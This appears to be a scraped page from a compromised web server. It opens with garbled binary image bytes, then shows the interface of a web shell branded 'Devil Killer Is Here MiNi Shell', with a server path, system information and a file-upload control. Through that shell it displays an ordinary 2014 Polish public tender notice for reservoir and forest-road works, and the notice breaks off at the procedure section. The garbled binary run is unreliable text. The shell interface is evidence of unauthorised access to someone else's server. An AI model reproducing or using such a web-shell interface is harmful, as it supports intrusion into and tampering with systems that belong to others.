JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140424/139370-N-2014.html

<p class="kh_header"><b>Rudziniec: Modernizacja - przebudowa zbiornika przeciwpożarowego o charakterze retencyjnym, urządzeń spustowo-przelewowych uszkodzonych w wyniku powodzi 2010 r. w leśnictwie Centawa, Gmina Strzelce Opolskie w ramach Programu dla Odry 2006
Zn.spr. 2710-2-2014</b><br>
<b>Numer ogłoszenia: 139370 - 2014; data zamieszczenia: 24.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGL LP Nadleśnictwo Rudziniec , ul. Leśna 7, 44-160 Rudziniec, woj. śląskie, tel. 32 300 81 50, faks 32 300 81 60.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Skarbu Państwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja - przebudowa zbiornika przeciwpożarowego o charakterze retencyjnym, urządzeń spustowo-przelewowych uszkodzonych w wyniku powodzi 2010 r. w leśnictwie Centawa, Gmina Strzelce Opolskie w ramach Programu dla Odry 2006
Zn.spr. 2710-2-2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót polegających na modernizacji 
           zbiornika  przeciwpożarowego o charakterze retencyjnym w leśnictwie Centawa - 
           w ramach  Programu dla Odry 2006 oraz przebudowa drogi p.poż. stanowiącej drogę
           dojazdową do przedmiotowego zbiornika wraz z placem manewrowym.
           Zamówienie zostało podzielone na dwie części:

           Część I. Modernizacja - przebudowa zbiornika p.poż. o charakterze 
                            retencyjnym, urządzeń spustowo-przelewowych uszkodzonych w 
                            wyniku powodzi 2010 r. w leśnictwie Centawa Gm. Strzelce Op.
                            w ramach Programu dla Odry 2006

           Część II. Przebudowa drogi leśnej wraz z placem manewrowym - do zbiornika
                             Centawa
 
    3.2. Opis prac związanych z zamówieniem:

           Część I:

           Modernizacja zbiornika przeciwpożarowego będzie polegała na:
          a) odmuleniu jego dna wraz z przywróceniem do stanu pierwotnego grobli czołowej:
              - powierzchnia zalewu: 11108,00 m2
              - powierzchnia zbiornika: 9997,2 m3
              - rzędna maksymalnego piętrzenia 232,90m npm
          b) modernizacji mnicha spustowego wraz z rowem odpływowym:
              - wysokość stojaka: 233,83 m npm
              - rzędna wlotu do leżaka: 231,91 m npm
              - rzędna wylotu: 231,91 m npm
              - średnica leżaka: 300 mm (rury betonowe)
              - wykonanie przyczółka wylotowego
              - ubezpieczenie dna i skarp rowu
          c) modernizacji przelewu burzowego wraz z rowem odpływowym:
              - rzędna wlotu: 232,95 m npm
              - rzędna wylotu: 232,90 m npm
              - rzędna przejazdu na przekroczeniu przez przelew: 233,60 m npm
              - wpływ z przelewu do ubezpieczenia geokratą z wypełnieniem kamieniem
                na długości 8,37 mb
              - ubezpieczenie dna koryta rowu
         d) modernizacji ujęcia
             (studnia ujściowa w północnej skarpie zbiornika - ujęcie p.poż.,
               średnica studni - beton DN 1000 mm, głębokość studni  - 3,27 m)

       Część II.

       1) Przebudowa drogi dojazdowej do zbiornika p.poż. o charakterze retencyjnym
           dł. drogi: 929,09 mb, szer. 3,20 mb
           (warstwa odsączająca o grubości 10 cm, warstwa dolna o grubości 25 cm, warstwa        
            górna o gr. 10 cm) 
       2) Przebudowa placu manewrowego - pow. 545,00 m2..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.24.72.70-3, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium.

8.1. Oferta musi być zabezpieczona wadium w wysokości:
      22 000,00 zł. (dwadzieścia dwa tysiące złotych)
8.2. Wadium należy wnieść przed upływem terminu składania ofert. Wniesienie wadium
       w pieniądzu będzie skuteczne, jeżeli znajdzie się na rachunku bankowym Zamawiającego
       przed upływem terminu składania ofert tj. do dnia 09.05.2014 r., godz. 13:00.  
8.3. Wadium może być wnoszone w jednej lub kilku następujących formach:
       a) pieniądzu: przelewem na rachunek bankowy Zamawiającego:
           BS Gliwice 23 8457 0008 2011 0056 9392 0003.
       b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
           kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
       c) gwarancjach bankowych;
       d) gwarancjach ubezpieczeniowych;
       e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2.
           ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju                                            
        Przedsiębiorczości (tekst jedn. Dz.U. z 2007 r. Nr 42, poz. 275 z póz.zm.)
8.4 . Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
8.5.  Treść wadium wniesionego w innej formie niż pieniądz musi zawierać pełną  nazwę
        zamówienia.
8.6.  Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
8.7.  Zamawiający  zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze
        oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy
        którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem  art. 46 ust. 1 
        ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych
       (tekst jedn. Dz.U. z 2013 r. poz. 907, 984, 1047, 1473 oraz z 2014 r. poz. 423)
        Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający
        zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego
        oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia
        żądano.
8.8.  Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał
        ofertę przed upływem terminu składania ofert.
8.9. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu 
         zwrócono wadium na podstawie art. 46 ust. 1 ustawy z dnia 29 stycznia 2004 r. 
         Prawo zamówień publicznych (tekst jedn. Dz.U.  z 2013 r. poz. 907, 984, 1047,
         oraz z 2014 r. poz. 423), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta
         została wybrana jako najkorzystniejsza.
         Wykonawca wnosi wadium w terminie określonym przez Wykonawcę.
8.10. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami 
         wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,
         pomniejszone  o koszty prowadzenia rachunku bankowego oraz prowizji bankowej
         za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
8.11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi
         na wezwanie, o którym mowa w art. 26 ust. 3 ustawy z dn. 29 stycznia 2004 r.
         Prawo zamówień publicznych (tekst jedn. Dz.U. z 2013 r. poz. 907, 984, 1047, 1473
         oraz z 2014. poz. 423), nie złożył dokumentów lub oświadczeń, o których mowa
         w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to 
         przyczyn niezależnych po jego stronie.                                       
8.12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca którego oferta
         została wybrana:
         a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
             określonych w ofercie,
         b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
         c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
             z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu:
         a) ocena spełnienia warunków dokonywana będzie zgodnie z formułą 
             spełnia - nie spełnia, na podstawie złożonych wraz z ofertą dokumentów oraz
             oświadczeń, których wykaz zawiera pkt. 6 SIWZ;
         b) Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do
              wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego
              łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest
              udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do 
              realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
              zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów
              na okres korzystania z nich przy wykonywaniu zamówienia;
          c) o udzielenie zamówienia mogą ubiegać się Wykonawcy występujący wspólnie:
             Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają
             pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
             albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
             publicznego
         d) Wykonawcy samodzielnie składający ofertę oraz każdy z Wykonawców składających
             wspólną ofertę musi spełniać warunek nie wykluczenia z postępowania opisany
             w art. 24 ust. 1 pkt. 1-11 ustawy Pzp;
        e) w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub  
             więcej Wykonawców, oceniana będzie ich łączna wiedza i doświadczenie oraz  
             sytuacja ekonomiczna i finansowa,
         f) brak jakiegokolwiek oświadczenia lub dokumentu wymienionego w pkt. 6 SIWZ
            spowoduje wykluczenie Wykonawcy z ubiegania się o udzielenie zamówienia
            publicznego z zastrzeżeniem art. 26 ust. 3 ustawy.
        g) złożenie przez Wykonawcę nieprawdziwych informacji, mających wpływ na wynik
            prowadzonego postępowania, spowoduje wykluczenie Wykonawcy z postępowania
            na podstawie art. 24 ust. 2 pkt. 3 ustawy.
        i) Zamawiający dopuszcza powierzenie części zamówienia podwykonawcom, pod
           warunkiem wskazania zakresu prac w ofercie - zał. Nr 1 do SIWZ.
           Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego
           i osób trzecich za prace roboty wykonane przez podwykonawców.  
        j) ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest przedstawienie wykazu robót budowlanych wykonanych i
            zakończonych w okresie ostatnich trzech lat przed upływem terminu składania ofert,
            a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem
            ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów 
            potwierdzających , że wymienione w wykazie roboty zostały wykonane zgodnie
            z zasadami sztuki budowlanej i prawidłowo ukończone. 
  5.2.1. W części I - co najmniej dwóch robót budowlanych polegających na budowie
             przebudowie lub rozbudowie zbiorników wodnych o pow. lustra wody
             co najmniej 1,00 ha i wartości minimum 600 000,00 zł brutto każda
  5.2.2. W części II - co najmniej dwóch robót budowlanych, polegających na budowie,
            przebudowie dróg o wartości minimum 200 000,00 zł  brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie potencjałem technicznym niezbędnym do wykonania zamówienia:

  5.4.1. W części I : koparka jednonaczyniowa na podwoziu gąsienicowym o poj. łyżki 
                                co najmniej 0,60 m3 - 1 szt., samochód samowyładowczy o tonażu 
                                5 t - 1 szt., spycharka gąsienicowa o mocy nie mniej niż 55 kW
                                (75KM) - 1 sz., ciągnik kołowy o mocy nie mniej niż55 kW                                                                                     
                                (75 KM) - 1 szt.
  5.4.2. W części II: koparko-ładowarka o poj. łyżki co najmniej 0,15 m3 - 1 szt. koparka
                                o poj. łyżki co najmniej 0,15 m3 - 1 sz., samochód samowyładowczy 
                                o ładowności co najmniej 10 t - 1 szt. walec samojezdny   - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia:

  5.3.1. W części I - dysponowanie  jedną osobą (pełniąca funkcję
            Kierownika budowy), posiadającą uprawnienia do wykonywania samodzielnych 
            funkcji technicznych w budownictwie, obejmującą co najmniej kierowanie
            robotami budowlanymi w specjalności konstrukcyjno-budowlanej, zgodnie z ustawą
            z 7 lipca 1994 r. Prawo Budowlane (Dz.U.10.243.1623 z póz.zm.) 
            oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia
            2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie
            (Dz.U.06.83.578) uprawniające do pełnienia funkcji kierownika budowy nad 
             wykonaniem budowli regulacyjnych - mogą to być np. uprawnienia konstrukcyjno-
             budowlane w specjalności budowle hydrotechniczne lub wodno-melioracyjne
             które będą uprawniały do pełnienia funkcji kierownika budowy nad realizacją
             robót odpowiadających swym zakresem przedmiotowi zamówienia. Wykonawca
             w celu potwierdzenia, że dysponuje lub będzie dysponował osobami posiadającymi
             odpowiednie przygotowanie techniczne i merytoryczne załączy wykaz osób
             przewidzianych do wykonania przedmiotu zamówienia.
             Dopuszczalne są uprawnienia, uzyskane na podstawie przepisów wcześniej
             obowiązujących. Wymagane jest co najmniej 5 letnie doświadczenie w pełnieniu
             w/w funkcji a także wpisanego na listę członków właściwej izby samorządu 
            zawodowego    zgodnie z przepisami prawa w danym kraju.
   5.3.2. W części II - dysponowanie jedną osobą pełniąca funkcję Kierownika robót 
            drogowych) posiadającą co najmniej 3 letnie doświadczenie
             zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie
             na stanowisku odpowiedzialnym za wykonywanie robót drogowych oraz 
             posiadającego uprawnienia do kierowania robotami drogowymi bez ograniczeń a 
            także wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z 
            przepisami prawa w danym kraju.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdowanie się w sytuacji finansowej i ekonomicznej umożliwiającej 
             wykonanie zamówienia:  

             Dla części I i II: znajdują się w sytuacji ekonomicznej i finansowej zapewniającej
             wykonanie zamówienia tj. posiadają środki finansowe lub posiadają zdolność
             kredytową  w wysokości nie mniejszej niż 400 000,00 zł (słownie: czterysta tysięcy
             złotych). Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej
             działalności związanej z przedmiotem zamówienia  na kwotę co najmniej
             400 000,00 zł (słownie: czterysta tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
